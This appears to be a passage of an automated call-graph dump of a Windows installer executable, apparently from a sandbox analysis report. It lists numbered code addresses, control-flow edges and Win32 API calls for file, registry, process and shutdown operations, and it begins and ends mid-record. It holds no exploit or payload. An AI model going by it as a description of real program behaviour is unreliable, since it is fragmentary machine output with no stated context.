4015->4014 4016->3971 5383 73c21a87 5384 73c21ab5 5383->5384 5385 73c22288 18 API calls 5384->5385 5386 73c21abc 5385->5386 5387 73c21ac3 5386->5387 5388 73c21acf 5386->5388 5389 73c2157e 2 API calls 5387->5389 5390 73c21af0 5388->5390 5391 73c21ad9 5388->5391 5394 73c21acd 5389->5394 5392 73c21af6 5390->5392 5393 73c21b1c 5390->5393 5395 73c21558 3 API calls 5391->5395 5396 73c215f4 3 API calls 5392->5396 5397 73c21558 3 API calls 5393->5397 5398 73c21ade 5395->5398 5399 73c21afb 5396->5399 5397->5394 5400 73c215f4 3 API calls 5398->5400 5401 73c2157e 2 API calls 5399->5401 5402 73c21ae4 5400->5402 5404 73c21b01 GlobalFree 5401->5404 5403 73c2157e 2 API calls 5402->5403 5405 73c21aea GlobalFree 5403->5405 5404->5394 5404->5405 4131 401b87 4132 401b94 4131->4132 4133 401bd8 4131->4133 4136 401c1c 4132->4136 4139 401bab 4132->4139 4134 401c01 GlobalAlloc 4133->4134 4135 401bdc 4133->4135 4138 4062ea 17 API calls 4134->4138 4145 40238f 4135->4145 4152 406257 lstrcpynA 4135->4152 4137 4062ea 17 API calls 4136->4137 4136->4145 4141 402389 4137->4141 4138->4136 4150 406257 lstrcpynA 4139->4150 4141->4145 4153 40596d 4141->4153 4143 401bee GlobalFree 4143->4145 4144 401bba 4151 406257 lstrcpynA 4144->4151 4148 401bc9 4157 406257 lstrcpynA 4148->4157 4150->4144 4151->4148 4152->4143 4155 405982 4153->4155 4154 4059ce 4154->4145 4155->4154 4156 405996 MessageBoxIndirectA 4155->4156 4156->4154 4157->4145 5407 40440a lstrcpynA lstrlenA 5408 40298a 5409 402c17 17 API calls 5408->5409 5410 402990 5409->5410 5411 4062ea 17 API calls 5410->5411 5412 4027c8 5410->5412 5411->5412 5413 40260c 5414 402c39 17 API calls 5413->5414 5415 402613 5414->5415 5418 405dea GetFileAttributesA CreateFileA 5415->5418 5417 40261f 5418->5417 5419 401490 5420 405378 24 API calls 5419->5420 5421 401497 5420->5421 5422 402590 5423 402c79 17 API calls 5422->5423 5424 40259a 5423->5424 5425 402c17 17 API calls 5424->5425 5426 4025a3 5425->5426 5427 4025ca RegEnumValueA 5426->5427 5428 4025be RegEnumKeyA 5426->5428 5429 4027c8 5426->5429 5430 4025df RegCloseKey 5427->5430 5428->5430 5430->5429 4896 40159d 4897 402c39 17 API calls 4896->4897 4898 4015a4 SetFileAttributesA 4897->4898 4899 4015b6 4898->4899 5432 40149d 5433 4014ab PostQuitMessage 5432->5433 5434 40238f 5432->5434 5433->5434 4925 401a1e 4926 402c39 17 API calls 4925->4926 4927 401a27 ExpandEnvironmentStringsA 4926->4927 4928 401a3b 4927->4928 4930 401a4e 4927->4930 4929 401a40 lstrcmpA 4928->4929 4928->4930 4929->4930 5440 40251e 5441 402c79 17 API calls 5440->5441 5442 402528 5441->5442 5443 402c39 17 API calls 5442->5443 5444 402531 5443->5444 5445 40253b RegQueryValueExA 5444->5445 5450 4027c8 5444->5450 5446 402561 RegCloseKey 5445->5446 5447 40255b 5445->5447 5446->5450 5447->5446 5451 4061b5 wsprintfA 5447->5451 5451->5446 5452 40471f 5453 404755 5452->5453 5454 40472f 5452->5454 5456 40433b 8 API calls 5453->5456 5455 4042d4 18 API calls 5454->5455 5457 40473c SetDlgItemTextA 5455->5457 5458 404761 5456->5458 5457->5453 5459 40171f 5460 402c39 17 API calls 5459->5460 5461 401726 SearchPathA 5460->5461 5462 401741 5461->5462 5463 401d1f 5464 402c17 17 API calls 5463->5464 5465 401d26 5464->5465 5466 402c17 17 API calls 5465->5466 5467 401d32 GetDlgItem 5466->5467 5468 402628 5467->5468 5469 402aa0 SendMessageA 5470 402ac5 5469->5470 5471 402aba InvalidateRect 5469->5471 5471->5470 4017 4023a4 4018 4023b2 4017->4018 4019 4023ac 4017->4019 4021 4023c2 4018->4021 4022 402c39 17 API calls 4018->4022 4020 402c39 17 API calls 4019->4020 4020->4018 4024 402c39 17 API calls 4021->4024 4026 4023d0 4021->4026 4022->4021 4024->4026 4027 402c39 4026->4027 4028 402c45 4027->4028 4033 4062ea 4028->4033 4031 4023d9 WritePrivateProfileStringA 4041 4062f7 4033->4041 4034 40651c 4035 402c66 4034->4035 4066 406257 lstrcpynA 4034->4066 4035->4031 4050 406535 4035->4050 4037 4064f6 lstrlenA 4037->4041 4038 4062ea 10 API calls 4038->4037 4041->4034 4041->4037 4041->4038 4043 406412 GetSystemDirectoryA 4041->4043 4044 406425 GetWindowsDirectoryA 4041->4044 4045 406535 5 API calls 4041->4045 4046 4062ea 10 API calls 4041->4046 4047 40649f lstrcatA 4041->4047 4048 406459 SHGetSpecialFolderLocation 4041->4048 4059 40613e 4041->4059 4064 4061b5 wsprintfA 4041->4064 4065 406257 lstrcpynA 4041->4065 4043->4041 4044->4041 4045->4041 4046->4041 4047->4041 4048->4041 4049 406471 SHGetPathFromIDListA CoTaskMemFree 4048->4049 4049->4041 4057 406541 4050->4057 4051 4065ad CharPrevA 4053 4065a9 4051->4053 4052 40659e CharNextA 4052->4053 4052->4057 4053->4051 4054 4065c8 4053->4054 4054->4031 4056 40658c CharNextA 4056->4057 4057->4052 4057->4053 4057->4056 4058 406599 CharNextA 4057->4058 4071 405c14 4057->4071 4058->4052 4067 4060dd 4059->4067 4062 406172 RegQueryValueExA RegCloseKey 4063 4061a1 4062->4063 4063->4041 4064->4041 4065->4041 4066->4035 4068 4060ec 4067->4068 4069 4060f5 RegOpenKeyExA 4068->4069 4070 4060f0 4068->4070 4069->4070 4070->4062 4070->4063 4072 405c1a 4071->4072 4073 405c2d 4072->4073 4074 405c20 CharNextA 4072->4074 4073->4057 4074->4072 4089 4020a5 4090 4020b7 4089->4090 4100 402165 4089->4100 4091 402c39 17 API calls 4090->4091 4092 4020be 4091->4092 4094 402c39 17 API calls 4092->4094 4093 401423 24 API calls 4096 4022ea 4093->4096 4095 4020c7 4094->4095 4097 4020dc LoadLibraryExA 4095->4097 4098 4020cf GetModuleHandleA 4095->4098 4099 4020ec GetProcAddress 4097->4099 4097->4100 4098->4097 4098->4099 4101 402138 4099->4101 4102 4020fb 4099->4102 4100->4093 4110 405378 4101->4110 4105 40210b 4102->4105 4107 401423 4102->4107 4105->4096 4106 402159 FreeLibrary 4105->4106 4106->4096 4108 405378 24 API calls 4107->4108 4109 401431 4108->4109 4109->4105 4111 405436 4110->4111 4112 405393 4110->4112 4111->4105 4113 4053b0 lstrlenA 4112->4113 4116 4062ea 17 API calls 4112->4116 4114 4053d9 4113->4114 4115 4053be lstrlenA 4113->4115 4118 4053ec 4114->4118 4119 4053df SetWindowTextA 4114->4119 4115->4111 4117 4053d0 lstrcatA 4115->4117 4116->4113 4117->4114 4118->4111 4120 4053f2 SendMessageA SendMessageA SendMessageA 4118->4120 4119->4118 4120->4111 5472 402e25 5473 402e34 SetTimer 5472->5473 5474 402e4d 5472->5474 5473->5474 5475 402ea2 5474->5475 5476 402e67 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5474->5476 5476->5475 5477 73c22b24 5478 73c22b76 5477->5478 5479 73c22b80 GetLastError 5478->5479 5480 73c22b8b 5478->5480 5479->5480 5481 73c21a24 5482 73c21504 GlobalFree 5481->5482 5484 73c21a3c 5482->5484 5483 73c21a7e GlobalFree 5484->5483 5485 73c21a5a 5484->5485 5486 73c21a6a VirtualFree 5484->5486 5485->5483 5486->5483 4158 402429 4159 402430 4158->4159 4160 40245b 4158->4160 4174 402c79 4159->4174 4162 402c39 17 API calls 4160->4162 4164 402462 4162->4164 4170 402cf7 4164->4170 4165 402441 4167 402c39 17 API calls 4165->4167 4169 402448 RegDeleteValueA RegCloseKey 4167->4169 4168 40246f 4169->4168 4171 402d0a 4170->4171 4173 402d03 4170->4173 4171->4173 4179 402d3b 4171->4179 4173->4168 4175 402c39 17 API calls 4174->4175 4176 402c90 4175->4176 4177 4060dd RegOpenKeyExA 4176->4177 4178 402437 4177->4178 4178->4165 4178->4168 4180 4060dd RegOpenKeyExA 4179->4180 4181 402d69 4180->4181 4182 402d73 4181->4182 4183 402e1e 4181->4183 4184 402d79 RegEnumValueA 4182->4184 4189 402d9c 4182->4189 4183->4173 4185 402e03 RegCloseKey 4184->4185 4184->4189 4185->4183 4186 402dd8 RegEnumKeyA 4187 402de1 RegCloseKey 4186->4187 4186->4189 4194 406663 GetModuleHandleA 4187->4194 4189->4185 4189->4186 4189->4187 4190 402d3b 6 API calls 4189->4190 4190->4189 4192 402e13 4192->4183 4193 402df5 RegDeleteKeyA 4193->4183 4195 406689 GetProcAddress 4194->4195 4196 40667f 4194->4196 4197 402df1 4195->4197 4200 4065f5 GetSystemDirectoryA 4196->4200 4197->4192 4197->4193 4199 406685 4199->4195 4199->4197 4201 406617 wsprintfA LoadLibraryExA 4200->4201 4201->4199 5487 73c21c2b 5488 73c21c52 5487->5488 5489 73c21cad __alldvrm 5488->5489 5490 73c21c8f GlobalFree 5488->5490 5491 73c2157e 2 API calls 5489->5491 5490->5489 5492 73c21d41 GlobalFree GlobalFree 5491->5492 5493 4027aa 5494 402c39 17 API calls 5493->5494 5495 4027b1 FindFirstFileA 5494->5495 5496 4027d4 5495->5496 5500 4027c4 5495->5500 5497 4027db 5496->5497 5501 4061b5 wsprintfA 5496->5501 5502 406257 lstrcpynA 5497->5502 5501->5497 5502->5500 5503 401c2e 5504 402c17 17 API calls 5503->5504 5505 401c35 5504->5505 5506 402c17 17 API calls 5505->5506 5507 401c42 5506->5507 5508 401c57 5507->5508 5509 402c39 17 API calls 5507->5509 5510 401c67 5508->5510 5511 402c39 17 API calls 5508->5511 5509->5508 5512 401c72 5510->5512 5513 401cbe 5510->5513 5511->5510 5515 402c17 17 API calls 5512->5515 5514 402c39 17 API calls 5513->5514 5516 401cc3 5514->5516 5517 401c77 5515->5517 5518 402c39 17 API calls 5516->5518 5519 402c17 17 API calls 5517->5519 5521 401ccc FindWindowExA 5518->5521 5520 401c83 5519->5520 5522 401c90 SendMessageTimeoutA 5520->5522 5523 401cae SendMessageA 5520->5523 5524 401cea 5521->5524 5522->5524 5523->5524 5525 40262e 5526 402633 5525->5526 5527 402647 5525->5527 5529 402c17 17 API calls 5526->5529 5528 402c39 17 API calls 5527->5528 5530 40264e lstrlenA 5528->5530 5531 40263c 5529->5531 5530->5531 5532 405e91 WriteFile 5531->5532 5533 402670 5531->5533 5532->5533 4203 401932 4204 401934 4203->4204 4205 402c39 17 API calls 4204->4205 4206 401939 4205->4206 4209 405a19 4206->4209 4250 405cd7 4209->4250 4212 405a41 DeleteFileA 4217 401942 4212->4217 4213 405a58 4216 405b90 4213->4216 4264 406257 lstrcpynA 4213->4264 4215 405a7e 4218 405a91 4215->4218 4219 405a84 lstrcatA 4215->4219 4216->4217 4282 4065ce FindFirstFileA 4216->4282 4265 405c30 lstrlenA 4218->4265 4221 405a97 4219->4221 4224 405aa5 lstrcatA 4221->4224 4225 405a9c 4221->4225 4227 405ab0 lstrlenA FindFirstFileA 4224->4227 4225->4224 4225->4227 4226 405bae 4285 405be9 lstrlenA CharPrevA 4226->4285 4229 405b86 4227->4229 4248 405ad4 4227->4248 4229->4216 4231 405c14 CharNextA 4231->4248 4232 4059d1 5 API calls 4233 405bc0 4232->4233 4234 405bc4 4233->4234 4235 405bda 4233->4235 4234->4217 4240 405378 24 API calls 4234->4240 4236 405378 24 API calls 4235->4236 4236->4217 4237 405b65 FindNextFileA 4239 405b7d FindClose 4237->4239 4237->4248 4239->4229 4241 405bd1 4240->4241 4242 406030 36 API calls 4241->4242 4245 405bd8 4242->4245 4244 405a19 60 API calls 4244->4248 4245->4217 4246 405378 24 API calls 4246->4237 4247 405378 24 API calls 4247->4248 4248->4231 4248->4237 4248->4244 4248->4246 4248->4247 4269 406257 lstrcpynA 4248->4269 4270 4059d1 4248->4270 4278 406030 MoveFileExA 4248->4278 4288 406257 lstrcpynA 4250->4288 4252 405ce8 4289 405c82 CharNextA CharNextA 4252->4289 4255 405a39 4255->4212 4255->4213 4256 406535 5 API calls 4262 405cfe 4256->4262 4257 405d29 lstrlenA 4258 405d34 4257->4258 4257->4262 4260 405be9 3 API calls 4258->4260 4259 4065ce 2 API calls 4259->4262 4261 405d39 GetFileAttributesA 4260->4261 4261->4255 4262->4255 4262->4257 4262->4259 4263 405c30 2 API calls 4262->4263 4263->4257 4264->4215 4266 405c3d 4265->4266 4267 405c42 CharPrevA 4266->4267 4268 405c4e 4266->4268 4267->4266 4267->4268 4268->4221 4269->4248 4295 405dc5 GetFileAttributesA 4270->4295 4273 4059f4 DeleteFileA 4275 4059fa 4273->4275 4274 4059ec RemoveDirectoryA 4274->4275 4276 4059fe 4275->4276 4277 405a0a SetFileAttributesA 4275->4277 4276->4248 4277->4276 4279 406051 4278->4279 4280 406044 4278->4280 4279->4248 4298 405ec0 4280->4298 4283 4065e4 FindClose 4282->4283 4284 405baa 4282->4284 4283->4284 4284->4217 4284->4226 4286 405c03 lstrcatA 4285->4286 4287 405bb4 4285->4287 4286->4287 4287->4232 4288->4252 4290 405c9d 4289->4290 4294 405cad 4289->4294 4292 405ca8 CharNextA 4290->4292 4290->4294 4291 405ccd 4291->4255 4291->4256 4292->4291 4293 405c14 CharNextA 4293->4294 4294->4291 4294->4293 4296 4059dd 4295->4296 4297 405dd7 SetFileAttributesA 4295->4297 4296->4273 4296->4274 4296->4276 4297->4296 4299 405ee6 4298->4299 4300 405f0c GetShortPathNameA 4298->4300 4325 405dea GetFileAttributesA CreateFileA 4299->4325 4302 405f21 4300->4302 4303 40602b 4300->4303 4302->4303 4304 405f29 wsprintfA 4302->4304 4303->4279 4306 4062ea 17 API calls 4304->4306 4305 405ef0 CloseHandle GetShortPathNameA 4305->4303 4307 405f04 4305->4307 4308 405f51 4306->4308 4307->4300 4307->4303 4326 405dea GetFileAttributesA CreateFileA 4308->4326 4310 405f5e 4310->4303 4311 405f6d GetFileSize GlobalAlloc 4310->4311 4312 406024 CloseHandle 4311->4312 4313 405f8f 4311->4313 4312->4303 4327 405e62 ReadFile 4313->4327 4318 405fc2 4320 405d4f 4 API calls 4318->4320 4319 405fae lstrcpyA 4321 405fd0 4319->4321 4320->4321 4322 406007 SetFilePointer 4321->4322 4334 405e91 WriteFile 4322->4334 4325->4305 4326->4310 4328 405e80 4327->4328 4328->4312 4329 405d4f lstrlenA 4328->4329 4330 405d90 lstrlenA 4329->4330 4331 405d98 4330->4331 4332 405d69 lstrcmpiA 4330->4332 4331->4318 4331->4319 4332->4331 4333 405d87 CharNextA 4332->4333 4333->4330 4335 405eaf GlobalFree 4334->4335 4335->4312 4351 4033b3 SetErrorMode GetVersionExA 4352 403405 GetVersionExA 4351->4352 4354 403444 4351->4354 4353 403421 4352->4353 4352->4354 4353->4354 4355 4034c8 4354->4355 4356 406663 5 API calls 4354->4356 4357 4065f5 3 API calls 4355->4357 4356->4355 4358 4034de lstrlenA 4357->4358 4358->4355 4359 4034ee 4358->4359 4360 406663 5 API calls 4359->4360 4361 4034f5 4360->4361 4362 406663 5 API calls 4361->4362 4363 4034fc 4362->4363 4364 406663 5 API calls 4363->4364 4365 403508 #17 OleInitialize SHGetFileInfoA 4364->4365 4443 406257 lstrcpynA 4365->4443 4368 403556 GetCommandLineA 4444 406257 lstrcpynA 4368->4444 4370 403568 4371 405c14 CharNextA 4370->4371 4372 40358f CharNextA 4371->4372 4380 40359e 4372->4380 4373 403664 4374 403678 GetTempPathA 4373->4374 4445 403382 4374->4445 4376 403690 4377 403694 GetWindowsDirectoryA lstrcatA 4376->4377 4378 4036ea DeleteFileA 4376->4378 4381 403382 12 API calls 4377->4381 4455 402f0c GetTickCount GetModuleFileNameA 4378->4455 4379 405c14 CharNextA 4379->4380 4380->4373 4380->4379 4384 403666 4380->4384 4383 4036b0 4381->4383 4383->4378 4387 4036b4 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4383->4387 4539 406257 lstrcpynA 4384->4539 4385 4036fd 4393 405c14 CharNextA 4385->4393 4426 403782 4385->4426 4438 403792 4385->4438 4389 403382 12 API calls 4387->4389 4391 4036e2 4389->4391 4391->4378 4391->4438 4394 403717 4393->4394 4401 4037c1 4394->4401 4402 40375c 4394->4402 4395 4037ac 4397 40596d MessageBoxIndirectA 4395->4397 4396 4038cf 4398 4038d7 GetCurrentProcess OpenProcessToken 4396->4398 4399 40394d ExitProcess 4396->4399 4403 4037b9 ExitProcess 4397->4403 4404 40391d 4398->4404 4405 4038ee LookupPrivilegeValueA AdjustTokenPrivileges 4398->4405 4549 4058d8 4401->4549 4406 405cd7 18 API calls 4402->4406 4408 406663 5 API calls 4404->4408 4405->4404 4409 403768 4406->4409 4411 403924 4408->4411 4409->4438 4540 406257 lstrcpynA 4409->4540 4414 403939 ExitWindowsEx 4411->4414 4415 403946 4411->4415 4412 4037e2 lstrcatA lstrcmpiA 4417 4037fe 4412->4417 4412->4438 4413 4037d7 lstrcatA 4413->4412 4414->4399 4414->4415 4565 40140b 4415->4565 4420 403803 4417->4420 4421 40380a 4417->4421 4419 403777 4541 406257 lstrcpynA 4419->4541 4552 40583e CreateDirectoryA 4420->4552 4557 4058bb CreateDirectoryA 4421->4557 4425 40380f SetCurrentDirectoryA 4428 40382a 4425->4428 4429 40381f 4425->4429 4483 403a3d 4426->4483 4561 406257 lstrcpynA 4428->4561 4560 406257 lstrcpynA 4429->4560 4432 4062ea 17 API calls 4433 40386c DeleteFileA 4432->4433 4434 40387a CopyFileA 4433->4434 4440 403837 4433->4440 4434->4440 4435 4038c3 4436 406030 36 API calls 4435->4436 4436->4438 4437 406030 36 API calls 4437->4440 4542 403963 4438->4542 4439 4062ea 17 API calls 4439->4440 4440->4432 4440->4435 4440->4437 4440->4439 4442 4038ae CloseHandle 4440->4442 4562 4058f0 CreateProcessA 4440->4562 4442->4440 4443->4368 4444->4370 4446 406535 5 API calls 4445->4446 4447 40338e 4446->4447 4448 403398 4447->4448 4449 405be9 3 API calls 4447->4449 4448->4376 4450 4033a0 4449->4450 4451 4058bb 2 API calls 4450->4451 4452 4033a6 4451->4452 4453 405e19 2 API calls 4452->4453 4454 4033b1 4453->4454 4454->4376 4568 405dea GetFileAttributesA CreateFileA 4455->4568 4457 402f4c 4477 402f5c 4457->4477 4569 406257 lstrcpynA 4457->4569 4459 402f72 4460 405c30 2 API calls 4459->4460 4461 402f78 4460->4461 4570 406257 lstrcpynA 4461->4570 4463 402f83 GetFileSize 4464 40307d 4463->4464 4480 402f9a 4463->4480 4571 402ea8 4464->4571 4466 403086 4468 4030b6 GlobalAlloc 4466->4468 4466->4477 4606 40336b SetFilePointer 4466->4606 4582 40336b SetFilePointer 4468->4582 4470 4030e9 4474 402ea8 6 API calls 4470->4474 4472 40309f 4475 403355 ReadFile 4472->4475 4473 4030d1 4583 403143 4473->4583 4474->4477 4478 4030aa 4475->4478 4477->4385 4478->4468 4478->4477 4479 402ea8 6 API calls 4479->4480 4480->4464 4480->4470 4480->4477 4480->4479 4603 403355 4480->4603 4481 4030dd 4481->4477 4481->4481 4482 40311a SetFilePointer 4481->4482 4482->4477 4484 406663 5 API calls 4483->4484 4485 403a51 4484->4485 4486 403a57 4485->4486 4487 403a69 4485->4487 4627 4061b5 wsprintfA 4486->4627 4488 40613e 3 API calls 4487->4488 4489 403a94 4488->4489 4491 403ab2 lstrcatA 4489->4491 4493 40613e 3 API calls 4489->4493 4492 403a67 4491->4492 4612 403d02 4492->4612 4493->4491 4496 405cd7 18 API calls 4497 403ae4 4496->4497 4498 403b6d 4497->4498 4500 40613e 3 API calls 4497->4500 4499 405cd7 18 API calls 4498->4499 4501 403b73 4499->4501 4502 403b10 4500->4502 4503 403b83 LoadImageA 4501->4503 4504 4062ea 17 API calls 4501->4504 4502->4498 4507 403b2c lstrlenA 4502->4507 4510 405c14 CharNextA 4502->4510 4505 403c29 4503->4505 4506 403baa RegisterClassA 4503->4506 4504->4503 4509 40140b 2 API calls 4505->4509 4508 403be0 SystemParametersInfoA CreateWindowExA 4506->4508 4538 403c33 4506->4538 4511 403b60 4507->4511 4512 403b3a lstrcmpiA 4507->4512 4508->4505 4513 403c2f 4509->4513 4515 403b2a 4510->4515 4514 405be9 3 API calls 4511->4514 4512->4511 4516 403b4a GetFileAttributesA 4512->4516 4517 403d02 18 API calls 4513->4517 4513->4538 4518 403b66 4514->4518 4515->4507 4519 403b56 4516->4519 4520 403c40 4517->4520 4628 406257 lstrcpynA 4518->4628 4519->4511 4522 405c30 2 API calls 4519->4522 4523 403c4c ShowWindow 4520->4523 4524 403ccf 4520->4524 4522->4511 4525 4065f5 3 API calls 4523->4525 4620 40544a OleInitialize 4524->4620 4528 403c64 4525->4528 4527 403cd5 4529 403cf1 4527->4529 4530 403cd9 4527->4530 4531 403c72 GetClassInfoA 4528->4531 4533 4065f5 3 API calls 4528->4533 4532 40140b 2 API calls 4529->4532 4536 40140b 2 API calls 4530->4536 4530->4538 4534 403c86 GetClassInfoA RegisterClassA 4531->4534 4535 403c9c DialogBoxParamA 4531->4535 4532->4538 4533->4531 4534->4535 4537 40140b 2 API calls 4535->4537 4536->4538 4537->4538 4538->4438 4539->4374 4540->4419 4541->4426 4543 40397b 4542->4543 4544 40396d CloseHandle 4542->4544 4640 4039a8 4543->4640 4544->4543 4547 405a19 67 API calls 4548 40379a OleUninitialize 4547->4548 4548->4395 4548->4396 4550 406663 5 API calls 4549->4550 4551 4037c6 lstrcatA 4550->4551 4551->4412 4551->4413 4553 403808 4552->4553 4554 40588f GetLastError 4552->4554 4553->4425 4554->4553 4555 40589e SetFileSecurityA 4554->4555 4555->4553 4556 4058b4 GetLastError 4555->4556 4556->4553 4558 4058cb 4557->4558 4559 4058cf GetLastError 4557->4559 4558->4425 4559->4558 4560->4428 4561->4440 4563 405923 CloseHandle 4562->4563 4564 40592f 4562->4564 4563->4564 4564->4440 4566 401389 2 API calls 4565->4566 4567 401420 4566->4567 4567->4399 4568->4457 4569->4459 4570->4463 4572 402eb1 4571->4572 4573 402ec9 4571->4573 4574 402ec1 4572->4574 4575 402eba DestroyWindow 4572->4575 4576 402ed1 4573->4576 4577 402ed9 GetTickCount 4573->4577 4574->4466 4575->4574 4607 40669f 4576->4607 4578 402ee7 CreateDialogParamA ShowWindow 4577->4578 4579 402f0a 4577->4579 4578->4579 4579->4466 4582->4473 4584 403159 4583->4584 4585 403187 4584->4585 4611 40336b SetFilePointer 4584->4611 4587 403355 ReadFile 4585->4587 4588 403192 4587->4588 4589 4032d8 4588->4589 4590 4031a4 GetTickCount 4588->4590 4591 4032ee 4588->4591 4589->4481 4590->4589 4597 4031f3 4590->4597 4592 403330 4591->4592 4595 4032f2 4591->4595 4593 403355 ReadFile 4592->4593 4593->4589 4594 403355 ReadFile 4594->4597 4595->4589 4596 403355 ReadFile 4595->4596 4598 405e91 WriteFile 4595->4598 4596->4595 4597->4589 4597->4594 4599 403249 GetTickCount 4597->4599 4600 40326e MulDiv wsprintfA 4597->4600 4602 405e91 WriteFile 4597->4602 4598->4595 4599->4597 4601 405378 24 API calls 4600->4601 4601->4597 4602->4597 4604 405e62 ReadFile 4603->4604 4605 403368 4604->4605 4605->4480 4606->4472 4608 4066bc PeekMessageA 4607->4608 4609 4066b2 DispatchMessageA 4608->4609 4610 402ed7 4608->4610 4609->4608 4610->4466 4611->4585 4613 403d16 4612->4613 4629 4061b5 wsprintfA 4613->4629 4615 403d87 4630 403dbb 4615->4630 4617 403ac2 4617->4496 4618 403d8c 4618->4617 4619 4062ea 17 API calls 4618->4619 4619->4618 4633 404320 4620->4633 4622 40546d 4625 405494 4622->4625 4636 401389 4622->4636 4623 404320 SendMessageA 4624 4054a6 OleUninitialize 4623->4624 4624->4527 4625->4623 4627->4492 4628->4498 4629->4615 4631 4062ea 17 API calls 4630->4631 4632 403dc9 SetWindowTextA 4631->4632 4632->4618 4634 404338 4633->4634 4635 404329 SendMessageA 4633->4635 4634->4622 4635->4634 4638 401390 4636->4638 4637 4013fe 4637->4622 4638->4637 4639 4013cb MulDiv SendMessageA 4638->4639 4639->4638 4641 4039b6 4640->4641 4642 403980 4641->4642 4643 4039bb FreeLibrary GlobalFree 4641->4643 4642->4547 4643->4642 4643->4643 4644 402733 4645 40273a 4644->4645 4648 402a47 4644->4648 4646 402c17 17 API calls 4645->4646 4647 402741 4646->4647 4649 402750 SetFilePointer 4647->4649 4649->4648 4650 402760 4649->4650 4652 4061b5 wsprintfA 4650->4652 4652->4648 5534 401e35 GetDC 5535 402c17 17 API calls 5534->5535 5536 401e47 GetDeviceCaps MulDiv ReleaseDC 5535->5536 5537 402c17 17 API calls 5536->5537 5538 401e78 5537->5538 5539 4062ea 17 API calls 5538->5539 5540 401eb5 CreateFontIndirectA 5539->5540 5541 402628 5540->5541 4668 4054b6 4669 405661 4668->4669 4670 4054d8 GetDlgItem GetDlgItem GetDlgItem 4668->4670 4671 405691 4669->4671 4672 405669 GetDlgItem CreateThread CloseHandle 4669->4672 4714 404309 SendMessageA 4670->4714 4675 4056bf 4671->4675 4676 4056e0 4671->4676 4677 4056a7 ShowWindow ShowWindow 4671->4677 4672->4671 4737 40544a 5 API calls 4672->4737 4674 405548 4680 40554f GetClientRect GetSystemMetrics SendMessageA SendMessageA 4674->4680 4678 4056c7 4675->4678 4679 40571a 4675->4679 4723 40433b 4676->4723 4719 404309 SendMessageA 4677->4719 4682 4056f3 ShowWindow 4678->4682 4683 4056cf 4678->4683 4679->4676 4687 405727 SendMessageA 4679->4687 4685 4055a1 SendMessageA SendMessageA 4680->4685 4686 4055bd 4680->4686 4690 405713 4682->4690 4691 405705 4682->4691 4720 4042ad 4683->4720 4685->4686 4693 4055d0 4686->4693 4694 4055c2 SendMessageA 4686->4694 4689 4056ec 4687->4689 4695 405740 CreatePopupMenu 4687->4695 4692 4042ad SendMessageA 4690->4692 4696 405378 24 API calls 4691->4696 4692->4679 4715 4042d4 4693->4715 4694->4693 4697 4062ea 17 API calls 4695->4697 4696->4690 4699 405750 AppendMenuA 4697->4699 4701 405781 TrackPopupMenu 4699->4701 4702 40576e GetWindowRect 4699->4702 4700 4055e0 4703 4055e9 ShowWindow 4700->4703 4704 40561d GetDlgItem SendMessageA 4700->4704 4701->4689 4705 40579d 4701->4705 4702->4701 4706 40560c 4703->4706 4707 4055ff ShowWindow 4703->4707 4704->4689 4708 405644 SendMessageA SendMessageA 4704->4708 4709 4057bc SendMessageA 4705->4709 4718 404309 SendMessageA 4706->4718 4707->4706 4708->4689 4709->4709 4710 4057d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4709->4710 4712 4057fb SendMessageA 4710->4712 4712->4712 4713 40581d GlobalUnlock SetClipboardData CloseClipboard 4712->4713 4713->4689 4714->4674 4716 4062ea 17 API calls 4715->4716 4717 4042df SetDlgItemTextA 4716->4717 4717->4700 4718->4704 4719->4675 4721 4042b4 4720->4721 4722 4042ba SendMessageA 4720->4722 4721->4722 4722->4676 4724 4043fe 4723->4724 4725 404353 GetWindowLongA 4723->4725 4724->4689 4725->4724 4726 404368 4725->4726 4726->4724 4727 404395 GetSysColor 4726->4727 4728 404398 4726->4728 4727->4728 4729 4043a8 SetBkMode 4728->4729 4730 40439e SetTextColor 4728->4730 4731 4043c0 GetSysColor 4729->4731 4732 4043c6 4729->4732 4730->4729 4731->4732 4733 4043d7 4732->4733 4734 4043cd SetBkColor 4732->4734 4733->4724 4735 4043f1 CreateBrushIndirect 4733->4735 4736 4043ea DeleteObject 4733->4736 4734->4733 4735->4724 4736->4735 5542 404ab7 5543 404ae3 5542->5543 5544 404ac7 5542->5544 5546 404b16 5543->5546 5547 404ae9 SHGetPathFromIDListA 5543->5547 5553 405951 GetDlgItemTextA 5544->5553 5549 404b00 SendMessageA 5547->5549 5550 404af9 5547->5550 5548 404ad4 SendMessageA 5548->5543 5549->5546 5551 40140b 2 API calls 5550->5551 5551->5549 5553->5548 5554 4014b7 5555 4014bd 5554->5555 5556 401389 2 API calls 5555->5556 5557 4014c5 5556->5557 5558 73c2103a 5559 73c21052 5558->5559 5560 73c210c4 5559->5560 5561 73c21080 5559->5561 5562 73c21060 5559->5562 5563 73c21504 GlobalFree 5561->5563 5564 73c21504 GlobalFree 5562->5564 5568 73c21078 5563->5568 5565 73c21071 5564->5565 5566 73c21504 GlobalFree 5565->5566 5566->5568 5567 73c21090 GlobalSize 5569 73c21099 5567->5569 5568->5567 5568->5569 5570 73c210ae 5569->5570 5571 73c2109d GlobalAlloc 5569->5571 5573 73c210b7 GlobalFree 5570->5573 5572 73c21558 3 API calls 5571->5572 5572->5570 5573->5560 4876 4015bb 4877 402c39 17 API calls 4876->4877 4878 4015c2 4877->4878 4879 405c82 4 API calls 4878->4879 4892 4015ca 4879->4892 4880 401624 4882 401652 4880->4882 4883 401629 4880->4883 4881 405c14 CharNextA 4881->4892 4885 401423 24 API calls 4882->4885 4884 401423 24 API calls 4883->4884 4886 401630 4884->4886 4891 40164a 4885->4891 4895 406257 lstrcpynA 4886->4895 4888 4058bb 2 API calls 4888->4892 4889 4058d8 5 API calls 4889->4892 4890 40163b SetCurrentDirectoryA 4890->4891 4892->4880 4892->4881 4892->4888 4892->4889 4893 40160c GetFileAttributesA 4892->4893 4894 40583e 4 API calls 4892->4894 4893->4892 4894->4892 4895->4890 5574 4016bb 5575 402c39 17 API calls 5574->5575 5576 4016c1 GetFullPathNameA 5575->5576 5578 4016d8 5576->5578 5583 4016f9 5576->5583 5577 40170d GetShortPathNameA 5579 402ac5 5577->5579 5580 4065ce 2 API calls 5578->5580 5578->5583 5581 4016e9 5580->5581 5581->5583 5584 406257 lstrcpynA 5581->5584 5583->5577 5583->5579 5584->5583 5585 40443f 5586 404455 5585->5586 5591 